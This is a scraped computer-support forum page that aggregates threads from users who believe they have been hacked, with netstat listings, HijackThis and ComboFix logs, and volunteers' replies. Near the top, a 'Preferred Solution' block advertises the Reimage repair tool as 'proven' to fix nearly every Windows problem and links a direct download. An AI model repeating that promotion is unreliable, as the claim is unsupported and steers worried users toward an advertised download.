Computer Support Forum

Hacked previously,Am I still Hacked or what

Question: Hacked previously,Am I still Hacked or what

I was hacked on previous laptop on windows xp. Now I changed my intenet provider and also have resinstalled windows 8 on another 2nd laptop for windows 8. But I believe I am still being hacked. In previous experience, with windows XP, I had traced an internal IP(Say in shared rental situation) and caught incoming connection on zonealarm. But the person reversed the zonealarm attacks saying going from me to other computers(WIn xp). And also, I had put a text file on windows XP of the internal IP Address putting title unauthorized access,and when I opened it few days later, it rather had my internal IP Address(192.168.XX .XXX.).. while going to one of the foreign address, it opened up the pic of shared rent person. But on another time, I found a virtual switch on laptop of another shared rent person in other room. Now I have windows 8. I am not broadcasting my SSID but still have problems of strange things happening.Here is the netstat command. I am not that computer savy at present and please need help as I believe I am still being hacked and my identity and financial accounts may be in danger. Please help guide. I do have the norton internet security installed and live in ca.Proto  Local Address          Foreign Address        StateTCP    192.168.1.101:50487    r3:https               ESTABLISHEDTCP    192.168.1.101:50491    pr:https               ESTABLISHEDTCP    192.168.1.101:50493    ne1onepush:https       ESTABLISHEDTCP    192.168.1.101:50860    pr:https               TIME_WAITTCP    192.168.1.101:50861    ne1onepush:https       TIME_WAITTCP    192.168.1.101:50864    l1:https               ESTABLISHEDTCP    192.168.1.101:50865    r2:https               ESTABLISHEDTCP    192.168.1.101:50868    a23-211-9-60:https     ESTABLISHEDTCP    192.168.1.101:50870    a23-59-197-231:http    TIME_WAITTCP    192.168.1.101:50875    rtr2:https             ESTABLISHEDTCP    192.168.1.101:50876    nuq04s30-in-f46:https  ESTABLISHEDTCP    192.168.1.101:50877    nuq04s30-in-f45:https  ESTABLISHEDTCP    192.168.1.101:50878    beap1:https            TIME_WAITTCP    192.168.1.101:50880    nuq04s19-in-f25:https  ESTABLISHEDTCP    192.168.1.101:50896    sa:https               TIME_WAITTCP    192.168.1.101:50897    sa:https               TIME_WAITTCP    192.168.1.101:50898    sa:https               TIME_WAITTCP    192.168.1.101:50899    ec2-50-19-233-239:https  TIME_WAITTCP    192.168.1.101:50900    ec2-54-187-111-93:https  TIME_WAITTCP    192.168.1.101:50901    sa:https               TIME_WAITTCP    192.168.1.101:50907    nuq04s18-in-f26:https  ESTABLISHEDTCP    192.168.1.101:50910    nuq04s18-in-f27:https  ESTABLISHEDTCP    192.168.1.101:50911    csc-beap:https         TIME_WAITTCP    192.168.1.101:50912    a104-68-109-48:https   ESTABLISHEDTCP    192.168.1.101:50913    a104-68-109-48:https   ESTABLISHEDTCP    192.168.1.101:50914    csc-beap:https         TIME_WAITTCP    192.168.1.101:50915    csc-beap:https         TIME_WAITTCP    192.168.1.101:50916    csc-beap:https         TIME_WAITTCP    192.168.1.101:50923    ne1onepush:https       ESTABLISHEDTCP    192.168.1.101:50924    pr:https               ESTABLISHEDTCP    192.168.1.101:50926    pr:https               ESTABLISHEDTCP    192.168.1.101:50927    ne1onepush:https       ESTABLISHEDTCP    192.168.1.101:50928    ec2-54-187-111-93:https  CLOSE_WAITTCP    192.168.1.101:50929    r1:https               ESTABLISHEDTCP    192.168.1.101:50930    ir1:https              ESTABLISHEDTCP    192.168.1.101:50931    a184-25-56-52:http     TIME_WAITTCP    192.168.1.101:50935    pr:https               TIME_WAITTCP    192.168.1.101:50936    sa:https               TIME_WAITTCP    192.168.1.101:50937    sa:https               TIME_WAITTCP    192.168.1.101:50938    sa:https               TIME_WAITTCP    192.168.1.101:50943    csc-beap:https         TIME_WAITTCP    192.168.1.101:50944    nuq04s19-in-f27:https  ESTABLISHEDTCP    192.168.1.101:50946    storage6-l3:https      ESTABLISHEDTCP    192.168.1.101:50951    storage1-l3:https      ESTABLISHEDTCP    192.168.1.101:50955    yts2:https             ESTABLISHEDTCP    192.168.1.101:50956    a104-68-109-74:https   ESTABLISHEDTCP    192.168.1.101:50958    lax02s21-in-f4:https   ESTABLISHEDTCP    192.168.1.101:50959    gd:https               ESTABLISHEDTCP    192.168.1.101:50961    a96-6-122-169:http     TIME_WAITTCP    192.168.1.101:50962    a96-6-122-169:http     ESTABLISHEDTCP    192.168.1.101:50963    beacon:https           ESTABLISHEDTCP    192.168.1.101:50964    a23-212-52-136:http    ESTABLISHEDTCP    192.168.1.101:50965    a23-212-52-136:http    ESTABLISHEDTCP    192.168.1.101:50966    a23-212-52-136:http    ESTABLISHEDTCP    192.168.1.101:50967    host-119-252-148-17:http  CLOSE_WAITTCP    192.168.1.101:50968    host-119-252-148-17:http  CLOSE_WAITTCP    192.168.1.101:50969    a184-25-56-84:http     ESTABLISHEDTCP    192.168.1.101:50970    a184-25-56-84:http     ESTABLISHEDTCP    192.168.1.101:50971    host-202-137-238-20:http  ESTABLISHEDTCP    192.168.1.101:50972    host-202-137-238-20:http  ESTABLISHEDTCP    192.168.1.101:50974    host-202-137-238-20:http  ESTABLISHEDTCP    192.168.1.101:50975    host-202-137-237-29:http  ESTABLISHEDTCP    192.168.1.101:50976    host-119-252-148-17:http  CLOSE_WAITTCP    192.168.1.101:50977    host-119-252-148-17:http  CLOSE_WAITTCP    192.168.1.101:50978    host-119-252-148-17:http  CLOSE_WAITTCP    192.168.1.101:50979    host-119-252-148-17:http  CLOSE_WAITTCP    192.168.1.101:50980    a104-68-96-138:http    ESTABLISHEDTCP    192.168.1.101:50981    a104-68-96-138:http    ESTABLISHEDTCP    192.168.1.101:50982    host-119-252-148-40:http  CLOSE_WAITTCP    192.168.1.101:50983    host-119-252-148-40:http  CLOSE_WAITTCP    192.168.1.101:50985    a104-68-96-138:http    ESTABLISHEDTCP    192.168.1.101:50986    host-119-252-148-40:http  CLOSE_WAITTCP    192.168.1.101:50987    host-202-137-237-29:http  ESTABLISHEDTCP    192.168.1.101:50988    host-119-252-148-17:http  CLOSE_WAITTCP    192.168.1.101:50989    host-119-252-148-17:http  CLOSE_WAITTCP    192.168.1.101:50990    host-119-252-148-17:http  CLOSE_WAITTCP    192.168.1.101:50991    a23-212-52-136:http    ESTABLISHEDTCP    192.168.1.101:50992    a23-212-52-136:http    ESTABLISHEDTCP    192.168.1.101:50993    host-119-252-154-22:http  CLOSE_WAITTCP    192.168.1.101:50994    host-119-252-148-17:http  ESTABLISHEDTCP    192.168.1.101:50995    host-119-252-154-22:http  ESTABLISHED​
 

Relevance 100%
Preferred Solution: Hacked previously,Am I still Hacked or what

I recommend downloading and running Reimage. It's a computer repair tool that has been proven to identify and fix many Windows problems with a high level of success.

I've used it in the past to identify and fix everything from blue screens (BSOD's), ActiveX errors, corrupt files and processes, dll/exe/sys errors, recover lost memory, Windows update problems, defragging, malware removal etc.

You can download it direct from this link http://downloadreimage.com/download.php. (This link will automatically start a download of Reimage that you can save to your computer.)

Answer: Hacked previously,Am I still Hacked or what

Hi,
 
Thats not real useful, need alittle more info.  Need to post a FRST log as a starting point. You can start at step 6 in this link below. Download, install FRST and post its log in your reply and we will go from there: Usually only online once or twice per day so you may not get a reply back from me until the following day.
 
http://www.bleepingcomputer.com/forums/t/34773/preparation-guide-for-use-before-using-malware-removal-tools-and-requesting-help/

2 more replies
Relevance 80.62%

I am posting this as follow up to previous post..
 
Please help as I know I was hacked on windows xp computer. Now I have the windows 8. The security logs earlier said someone was scanning for the account without password. I am not sure how this guest account is enabled in the text files generated. One more thing. My Norton internet addition toolbar has been acting weird. I always enable it, then it gives me prompt to reenable it again and again. While posting this website said that the website is down 11/18/2015 around 12:00 to 12:18 am PST. Also there are lots of strange things going on. It could be from a person in same home too. Please help.
 
*************************************************************************

Answer:Hacked previously,Am I still Hacked or what(contd to post logs)

Norton Internet security always gets enable prompt on the google chrome. And also in the addition.txt, the guest account is saying limited enabled, Now after posting and in few minutes, when I am on useraccounts, it says that the guest account is off. I am not too sure why my laptop stays on when I get up in morning, I am not too sure whether my laptop didn't turn off.

2 more replies
Relevance 91.02%

Here's my Hijack this log after doing 5 scans with CCcleaner and various anti spyware. I found only 2 things with Spybot, beyond that there was nothing. Tell me if I need to worried about anything, so I can change my passwords safely.

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 17:09:16, on 19/04/2010
Platform: Unknown Windows (WinNT 6.01.3504)
MSIE: Internet Explorer v8.00 (8.00.7600.16385)
Boot mode: Normal

Running processes:
C:\Program Files (x86)\Trusteer\Rapport\bin\RapportService.exe
C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
C:\Program Files (x86)\Steam\steam.exe
C:\Program Files (x86)\Spybot - Search & Destroy\TeaTimer.exe
C:\Program Files (x86)\Google\Quick Search Box\GoogleQuickSearchBox.exe
C:\Windows\SysWOW64\Ctxfihlp.exe
C:\Program Files\Logitech\SetPoint\x86\SetPoint32.exe
C:\Program Files (x86)\Java\jre6\bin\jusched.exe
C:\Program Files\Alwil Software\Avast5\AvastUI.exe
C:\Windows\SysWOW64\CTXFISPI.EXE
C:\Program Files (x86)\Lavasoft\Ad-Aware\AAWTray.exe
C:\Program Files (x86)\Trend Micro\HijackThis\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://uk.msn.com/
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://uk.msn.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69... Read more

More replies
Relevance 83.64%

Hello TechGuys,

In the last 48 hours I've been through a lot because of this.
My hosting nearly got suspended and my friends are really mad.

Below are the required log files. Really looking forward to your assistance.

Thanks in advanced,
t_kio

Here's my TSG SysInfo result:

Code:

Tech Support Guy System Info Utility version 1.0.0.1
OS Version: Microsoft Windows 7 Ultimate , 64 bit
Processor: AMD Athlon(tm) II X4 630 Processor, AMD64 Family 16 Model 5 Stepping 2
Processor Count: 4
RAM: 4095 Mb
Graphics Card: ATI Radeon HD 5570, 1024 Mb
Hard Drives: C: Total - 200004 MB, Free - 110180 MB; D: Total - 20010 MB, Free - 18031 MB; E: Total - 256922 MB, Free - 649 MB; F: Total - 476898 MB, Free - 510 MB; G: Total - 476953 MB, Free - 44626 MB; H: Total - 476945 MB, Free - 834 MB;
Motherboard: MICRO-STAR INTERNATIONAL CO.,LTD, 770-C45 (MS-7599), 1.0, To be filled by O.E.M.
Antivirus: AntiVir Desktop, Updated and Enabled

Here's the hijackthis.log:

Code:

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 01:25:09, on 21/07/2011
Platform: Windows 7 (WinNT 6.00.3504)
MSIE: Internet Explorer v9.00 (9.00.8112.16421)
Boot mode: Normal

Running processes:
C:\Program Files (x86)\Spotmau\Data Recovery Kit\DRtray.exe
C:\Program Files (x86)\Yahoo!\Messenger\YahooMessenger.exe
C:\Program Files (x86)\Genie-Soft\GBMPro8\GBMAgent.exe
C:\Program Files (x86)\Free Download Manager\fdm.exe
C:\PROGRA~2\DUMETE~1\DUMeter.exe
C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe
C:\... Read more

More replies
Relevance 81.18%

Was just recently informed that my debit card was used in over 4 different states. Going to bank tomorrow to sort that out. But just recently saw that my facebook was signed into from Japan. I'm assuming they have most of my info. and would appreciate someone that could help me get rid of whatever they got on my computer. Tried to start malwarebytes to start. No luck. Thank you soo much for your time.

Answer:Debit Card hacked, Facebook Hacked, etc.

Hello,Please follow the instructions in ==>This Guide<== starting at step 6. If you cannot complete a step, skip it and continue.Once the proper logs are created, then post them in a reply to this topic by using the Add Reply button.If you can produce at least some of the logs, then please create the post and explain what happens when you try to create the log(s) that you couldn't get. If you cannot produce any of the logs, then still post the reply and explain that you followed the Prep. Guide, were unable to create the logs, and describe what happens when you try to create the logs.Please note that I am not a member of the Malware Removal Team and will not be assisting you in removing the infection. I'm simply helping you to post the information they need in order to assist you.If HelpBot replies to your topic, PLEASE follow Step One so it will report your topic to the team members.Orange Blossom

10 more replies
Relevance 78.31%

My WoW account was recently hacked into. After dealing with blizzard i had my password changed and my account restored. The hacker then hacked my account again and this time changed my Battle.net address along with the password. He also attempted to steal my hotmail at this point in time. I then began to look for keyloggers and viruses with hijackthis and various virus programs including Spybot, Kaspersky, Microsoft Security Essentials, and MalwareBytes. I deleted a bunch of toolbars using hijackthis and am stumbling across various files that i am unsure of. I do not want to mess up my new computer so i am going to stop deleting things until further notice.

Answer:My WoW account was hacked along with my email. am i still hacked?

Hello,Please follow the instructions in ==>This Guide<==. If you cannot complete a step, skip it and continue.Once the proper logs are created, then make a NEW TOPIC and post it ==>HERE<== Please include a description of your computer issues and what you have done to resolve them.If you can produce at least some of the logs, then please create the new topic and explain what happens when you try to create the log(s) that you couldn't get. If you cannot produce any of the logs, then still post the topic and explain that you followed the Prep. Guide, were unable to create the logs, and describe what happens when you try to create the logs.Orange Blossom

1 more replies
Relevance 78.31%

1st off let me say THANK YOU in advance for , (1) having this cool site so as to help ppl like me that are not computer savvy. And (2) for actually HELPING us!!!
And now for my question/problem . Is someone trying to hack my system? Or worse, has someone already HACKED MY SYSTEM ? Today Norton security pops up an alert. So as I am reviewing my Alerts from the last 2 days , I see the following ( notice the date the 7th of march. The list is repeated several times on the 8th as well )
&#65279;Category: Firewall - Network and Connections
Date & Time,Risk,Activity,Status,Recommended Action,Category
2013-03-07 22:35:54,Info,"Protecting your connection to a newly detected network on adapter \"Teredo Tunneling Pseudo-Interface\" (IP address: fe80::ffff:ffff:fffd%5).",Detected,No Action Required,Firewall - Network and Connections
Protecting your connection to a newly detected network on adapter "Teredo Tunneling Pseudo-Interface" (IP address: fe80::ffff:ffff:fffd%5).
&#65279;Category: Firewall - Network and Connections
Date & Time,Risk,Activity,Status,Recommended Action,Subnet Identifier
2013-03-07 22:28:09,Info,Connected to a protected network. (127.0.0.0/255.0.0.0),Protected,No Action Required,127.0.0.0/255.0.0.0
Your computer is currently protected from the local network. To allow all the computers on this network to communicate with your computer, in the <b>Actions</b> panel, click <b>Trust</b>. To block al... Read more

Answer:Solved: my network: HACKED OR NO HACKED?

6 more replies
Relevance 72.16%

Hi guys,
 
Last night i my mouse/screen froze up suddenly for about 5 seconds randomly and then i noticed my internet seemed a bit slower.
 
Call me paranoid but for some reason i started worrying about a hacker, did some research and now i am petrified.
 
I'm running Windows 7 and i did scans with Malware Bytes, Super Anti Spyware and boot time scan with Avast which all showed clean.
 
After i restarted my router/computer things returned to normal. I have Windows firewall running and i am behind a router.
 
The reason i am concerned is that i hadn't patched my Windows 7 OS security updates in ages (have done so now), and i know hackers can exploit these.
 
My question is, would a hacker hack my PC directly and is it possible to view my files remotely without installing malware or a RAT?
 
In other words, what are the chances someone had exploited my PC, took my files but after i restarted they were gone because there was no RAT installed?
 
Please forgive me if this is a dumb question..

Answer:Likelihood that i was hacked or am being hacked?

Hi ionblue The chances that you were hacked are really slow. It happens on every system and device that sometime, a process crashes, slowing down the whole system and that rebooting it allows it to restart normally. There's nothing wrong with that. This situation is way too common and the possibilities are way too broad to say that you were hacked. In my opinion, you just encountered a random crash, slowness and restarting your system allowed it to restart properly. Simple as that.

7 more replies
Relevance 58.22%

I ran a skan yesterday and had alot of trojans does this mean i have been hacked if so does it mean my pictures passwords and other info has been stolen if so wat would a hacker/cracker do with this info
and i am young and dont have bank info and etc. so would they have taken or planted anything
 

More replies
Relevance 58.22%
Question: HACKED ???

Hi there! I believe that I have been hacked in some way. Nothing major I hope, but my register is affected in some way although it is not giving any trouble?? A couple of days ago, I suddenly found that I had no access to my STEAM account. I still don't and I have not been able to no matter what! I have had to open a new account! The rescue system on Steam hasn't worked for me. I have had to send a snail mail that might not get there! I have re-installed Windows 7 but my registry is not the same as it was! I have found a directory in there that I can't open??? Tried to post image???  Anyone know a good reg repairer??? . 

Answer:HACKED ???

I have ended up with a corrupted Registry guys.    Anyone know of a treatment plz?

9 more replies
Relevance 58.22%

hello, I am having a problem staying online I keep getting disconnected from the internet, so I called my isp and he scanned the line and told me that their is something wrong, he said it's either malware or a hacker, I have tried formating my hdd in another pc, and then reinstalling window's xp on it, I still am having this problem, and even as I type this message I have been disconected 5 time's, I have ran avg,malware byte's, and bit defender, nothing work's please help me

Tech Support Guy System Info Utility version 1.0.0.2 OS Version: Microsoft Windows XP Home Edition, Service Pack 3, 32 bit Processor: Intel(R) Pentium(R) 4 CPU 2.80GHz, x86 Family 15 Model 4 Stepping 9 Processor Count: 2 RAM: 501 Mb Graphics Card: Hard Drives: C: Total - 76316 MB, Free - 72392 MB; Motherboard: LENOVO, LENOVO Antivirus: None
 

Answer:being hacked please help me

16 more replies
Relevance 58.22%
Question: Hacked

I was hacked and before I realized it, a pop up came up and I only saw the last of the password (*******) typed. now no .exe will run

More replies
Relevance 58.22%

So today someone got onto all of my email accounts changed the pw's ect. I was quick to act and found out 2 hours after. Reset all pws and got them back. They also attempted to change my password here on bleeping computer and I got an email that shows the ip address of the person who tried to reset it. They did not steal any money (yet) is there anything i can do with this ip address or anything i can do to find the person or get them in trouble?

They also tried to change the 2nd email on my email account so if I tried to recover the pw the recovery info would be sent to there email so I have that email. Any ideas on what to do next?

I scanned all my computers so I dont know how they keylogged me. I dont click links or open emails from people I dont know and my pw Is not easy to guess its leters and numbers out of the 4 email accounts they got 3 had different passwords (2 emails had the same pw)

Answer:I'v been hacked, what to do next

Anyway to find out who it is or get them in trouble?

3 more replies
Relevance 58.22%
Question: i got hacked

my true vector has been disabled by a hacker in zone alarm and the hacker placed a sticky key on my desk top he/she also controlled my mouse operation whilst i was playing a game

i have ran spybot and destroyed malware but would like for u to just check this start up list for me incase he/she done anythin worse than just a sticky key an disabling zonealarm my norton antivirus didnt pick anythin up either.

is there any way to get my zone alarm to run again or should i use a different firewall
 

Answer:i got hacked

8 more replies
Relevance 58.22%

Hi guys,

my computer is running really slow. I've previously reformatted it and it's been running great. the performance levels top up all the time even with one or no applications running. Any suggestions?
Thanks.

Answer:I Believe I've Been Hacked

Please have aread thru this topic . Let us know what you need after thet,thanks.Slow Computer/browser? Check Here First; It May Not Be Malware

3 more replies
Relevance 58.22%

ok, so i had google chrome running and in the task bar. havent used it in like 10 minutes. stepped away, when i came back it says "google chrome has stopped working" i clicked ok and it said "checking for a solution" and then a box popped up that said "sick my d**ck mother fu**er". and above it it said "you are rocker", which is my psn name. it said sick not suck, i guess a typo? im kind of freaking out now lol what the heck is going on?

Answer:may have been hacked???

Go here Spyware-Asylum, select your operating system and go through the "Full Scan" and post the log files.

9 more replies
Relevance 58.22%
Question: Hacked!

Okay so i got hacked recently to the point where i couldnt even boot my computer up, it said missing ntdlr or somethin like that. So i formated in Recovery, well now i wonna Install windows everything goes well up to the part where it should let you choose a partition, i have deleted the one in the recovery page, and made a new one, and idk everytime i get to where it should let u choose a partition it says its an invalid disk wich i dont see why it says that because this is the real windows xp home disk so

Answer:Hacked!

OK i figured it out it's an upgrade disk wich means i need windows 98, anybody got the install for it?

7 more replies
Relevance 58.22%
Question: MSN hacked

guyss....my MSN messenger/hotmail account was hacked and the password was changed.. any way to find out what the password is and get back into hotmail? it wud help so much, thanks

(the secret question and all that was changed too so i cant answer that )

Answer:MSN hacked

if you remember what you put in as your secret question you can just answer it then change the password back

3 more replies
Relevance 58.22%
Question: Hacked ?

I'm sure I am being hacked, I keep getting unusual problems(blue screens.auto reboots etc) No new s/w has been installed prior to these problems. I have tried to use spyware but that hangs at a certain point of searching !!! Apart from disabling my internet connection, what can I do ?
 

Answer:Hacked ?

16 more replies
Relevance 58.22%
Question: Hacked......twice

Hi,

I am not very computer savvy, so bear with me.

I believe the person I previously hired (independently) put keylogging software on my computer. He set up my Google email account and I believe has admin privileges as he is an IT person for a school district. He installed Norton Endpoint Protection (from my employer) as well as updated versions of Windows, etc. My google account was hacked into and eventually my laptop was as well. I got several notifications that someone else (from different computer) was using my IP address and also a notice about MAC spoofing. After all that happened, I deactivated my google account; wiped out my laptop (partitions were deleted/full erase) and reinstalled to factory out-of-box. I got a new modem from my provider.

Everything appeared fine for about a week or so, then I noticed the time setting changed as well as some of the settings. I ran a pingwww.infopackets.com command and it came back as going through my provider (though two of the addresses were invalid) and going through two other providers (different states) consistently. I made reports to my provider as well as the other provider; sent logs to my provider and am waiting to hear back.

Any traces I do consistently go to a private IP address that I cannot identify. I did a few DNS trace routes from the web previously and they came back as not existing (some letters/numbers resembled my carrier but it was not legit). I now have a bunch of programs and processes that were on my ... Read more

Answer:Hacked......twice

Hello and welcome.We need a deeper look. Please go here....Preparation Guide ,do steps 6 - 9.Create a DDS log and post it in the new topic explained in step 9,which is here Virus, Trojan, Spyware, and Malware Removal Logs and not in this topic,thanks.If Gmer won't run,skip it and move on.Let me know if that went well.

5 more replies
Relevance 58.22%

ok, not all that computer literate, but I am pretty sure I have been hacked. Also, that my ip address might have been traced to my home address. Can anyone help me detect/get rid of any spyware, and is there any other way someone can track you thru cyberspace? Thanks to anyone who can help me....

Answer:I think I've been hacked...

Why do you think you have been hacked? Your IP address is not 100&#37; traceable to your house the closest they can get is the street normaly even then it's not realy all that worth it.

What antivirus are you using at the moment? is it uptodate?

2 more replies
Relevance 58.22%
Question: Am i being hacked?

Hi there -

I switched on the logging features in my XP Firewall and then read the pfirewall.log text - There are lots of entries, how do i know if someone is hacking my PC?

Answer:Am i being hacked?

Just ingoing and outgoing communications

2 more replies
Relevance 58.22%

I alt tabbed out of a wow and open firefox thus 100's of tabs opening by themselves. And left clicking on the desktop anywhere open windows helper thing. I'm using windows 7. build 7100. is this something to do with a virus/exploit?
How do i fix it?

thanks
 

Answer:was i hacked?!?!?!?

Uhm.... anti-virus and anti-malware?

Doubtful that you were "hacked".

You probably downloaded one or more viruses and/or malware.

Go install Avira free and MalwareBytes, run both of those, and report back with the results. If you can't get them to download or install, boot into Safe Mode with Networking to download and install them.

You should probably try scanning with other AV and AM software as well, but I'd be interested in seeing what just those two will pick up.
 

22 more replies
Relevance 58.22%

hello guys its been a while but my damn brother downloaded something and now my comp is acting weird, please help me......

here is my kijackthis log:




Logfile of HijackThis v1.99.1
Scan saved at 11:16:41 AM, on 4/13/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16640)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\LEXBCES.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\LEXPPS.EXE
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\WINDOWS\eHome\ehRecvr.exe
C:\WINDOWS\eHome\ehSched.exe
C:\Program Files\Common Files\New Boundary\PrismXL\PRISMXL.SYS
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\dllhost.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\wscntfy.exe
C:\WINDOWS\SOUNDMAN.EXE
C:\WINDOWS\ehome\ehtray.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\AIM95\aim.exe
C:\Program Files\Messenger\msmsgs.exe
C:\Program Files\BigFix\BigFix.exe
C:\WINDOWS\eHome\ehmsas.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files\Winamp\winamp.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Documents and Settings\Owner\Desktop\comp fix\hijackthis\HijackThis.exe... Read more

Answer:I've been hacked....please help

I know you guys are busy but if someone could please help me asap my girlfriend needs to use my computer for online classes and i dont even want to turn my comp on cuz of this virus. please help me guys. thanks for your help inadvance!!



-Dennis

13 more replies
Relevance 58.22%
Question: hacked

Thank you all in advance for your advice. A day or so ago my computer started to behave oddly. Including trying to open my online banking page today... So I have been running virus/spyware softwares... I use avast, spybot, cccleaner, asc, and just useed combofix. Here is my log post them. Do I have a hacker? or any issues still?
ComboFix 11-03-07.02 - STABBS 03/07/2011 16:05:45.1.2 - x86
Microsoft® Windows Vista™ Home Premium 6.0.6002.2.1252.1.1033.18.2046.860 [GMT -5:00]
Running from: c:\users\STABBS\Downloads\ComboFix.exe
AV: avast! Antivirus *Disabled/Updated* {2B2D1395-420B-D5C9-657E-930FE358FC3C}
FW: PC Tools Firewall Plus *Enabled* {175D0B73-9F8F-2CA9-8BF1-62277A276DC9}
SP: avast! Antivirus *Disabled/Updated* {904CF271-6431-DA47-5FCE-A87D98DFB681}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\audiograbber\audiograbber.exe
C:\Microsoft
c:\users\STABBS\AppData\Roaming\ClickPotatoLite
c:\users\STABBS\AppData\Roaming\inst.exe
c:\windows\system32\AutoRun.inf
c:\windows\system32\ccrpTmr6.dll
c:\windows\system32\LogFiles\Firewall\mpssvc.dat
c:\windows\system32\LogFiles\HTTPERR\httperr1.log
c:\windows\system32\LogFiles\Scm\SCM.EVM
c:\windows\system32\LogFiles\Scm\SCM.EVM.1
c:\windows\system32\LogFiles\Scm\SCM.EVM.2
c:\windows\system32\LogFiles\Scm\SCM.EVM.3
c:\windows\system32\LogFiles\Scm\SCM.EVM.4
c:\windows\system32\LogFile... Read more

More replies
Relevance 58.22%

For the past few days things have not been right in regards to my main computer. The My Documents file in drive C is empty and nothing runs the same way-shortcuts don't work anymore and Windows media player is just gone!

How can I find out what happened to it? How difficult would it be to replace the motherboard and processor in it(Sony Vaio Pentium 4)?

Thanks for any help you might be able to give.
Randi

Answer:Help-I think I've been hacked!

Time to refer to Osiris' tutorial guide :

http://www.techist.com/forums/f70/sp...2008-a-165848/


You can have your results analyzed here :

HijackThis Logs (analyze) - Computer Forums

8 more replies
Relevance 58.22%
Question: I Am Being Hacked

I have eBlaster by SpectorSoft, a keyboard logger, detected by SpyReveal on my laptop for some unknown reason, and this company says they cannot verify a signal from it or help me remove it. I'd love to prosecute the person who is receiving the emails of everything I type. I can't subpoena the information from SpectorSoft unless they say they are receiving a signal from my IP. In my opinion, there is no reason for them to do so as by not complying they avoid the entire issue.

Because I don't trust my home security I have gone to WiFi cafe's to work, hence, in my opinion, the hack's need for SpectorSoft eBlaster to get me wherever I am and have all keystrokes emailed to them.

If the hacks got to my laptop, they are also probably in my desktop - which I am using right now, and my online Uverse Yahoo email. I need to document any possible internet or email link to SpectorSoft and the email or internet address to the perpetrators, "but mostly to at least know I have a secure system that will stay that way!"

My website, with which I attempt to earn a living, has also been recently, but repeatedly, hacked from IP addresses listed on my ftp logs, but which are registered as "private" and that I therefore currently cannot trace. The hacks apparently just use my password and proceed to change my links to sites that download viruses, which is not good for business or SEO.

I am running:
- Norton Internet Security (A/V and firewall, whic... Read more

Answer:I Am Being Hacked

Hello,please run these...Next run ATF and SAS: If you cannot access Safe Mode,run in normal ,but let me know.Note: On Vista, "Windows Temp" is disabled. To empty "Windows Temp" ATF-Cleaner must be "Run as an Administrator".From your regular user account..Download Attribune's ATF Cleaner and then SUPERAntiSpyware , Free Home Version. Save both to desktop ..DO NOT run yet.Open SUPER from icon and install and Update itUnder Scanner Options make sure the following are checked (leave all others unchecked):Close browsers before scanning.Scan for tracking cookies.Terminate memory threats before quarantining.Click the "Close" button to leave the control center screen and exit the program. DO NOT run yet.Now reboot into Safe Mode: How to enter safe mode(XP)Using the F8 MethodRestart your computer. When the machine first starts again it will generally list some equipment that is installed in your machine, amount of memory, hard drives installed etc. At this point you should gently tap the F8 key repeatedly until you are presented with a Windows XP Advanced Options menu. Select the option for Safe Mode using the arrow keys. Then press enter on your keyboard to boot into Safe Mode. Double-click ATF-Cleaner.exe to run the program.Under Main "Select Files to Delete" choose: Select All.Click the Empty Selected button.If you use Firefox or Opera browser click that browser at the top and choose: Select AllClick the Empty Selected button.I... Read more

1 more replies
Relevance 58.22%

Never thought I'll post here, but in the last week, wierd things have been happening to my computer. In the beggining, a problem came up and said to me that I need to update my graphics driver, which was true, but when I clicked "Show Solution" the thing redirected me to install some software that had stollen the Norton icon.After that, I scanned the computer and removed 22 spyware. Good, but after a day, suprise! I can see a wierd account at the Logon screen. After Loging On, I immediately went to cmd.exe to disable it and delete it. For 3 days, I was fine, but then, the Internet browser, after closing my games, was opened on bit.ly, not by me. Ok.Returned to my good ol' friend ESET Smart Security. Found 25 viruses and deleted them. After that, ESET detected no suspicious things in my PC, so, because it made the computer boot slower, I unninstalled it. Today, something that scared me: I was browsing the Internet when suddendly, a bit.ly page opens. I close it, then close Firefox, disconnect myself from the Internet and start playing reliefed NFS Most Wanted. I think I know what's the problem: I use Vista SP2 without any single security update cause I can't update it. What to do to get rid of the hacker and to install these damn updates?Edit: Moved topic from Virus, Trojan, Spyware, and Malware Removal Logs to the more appropriate forum. ~ Animal

Answer:I think I got hacked

Download Security Check from here or here and save it to your Desktop. Double-click SecurityCheck.exe Follow the onscreen instructions inside of the black box. A Notepad document should open automatically called checkup.txt; please post the contents of that document.NOTE 1. If one of your security applications (e.g., third-party firewall) requests permission to allow DIG.EXE access the Internet, allow it to do so.NOTE 2. SecurityCheck may produce some false warning(s), so leave the results reading to me.NOTE 3. If you receive UNSUPPORTED OPERATING SYSTEM! ABORTED! message restart computer and Security Check should run Please download Farbar Service Scanner (FSS) and run it on the computer with the issue.Make sure the following options are checked:
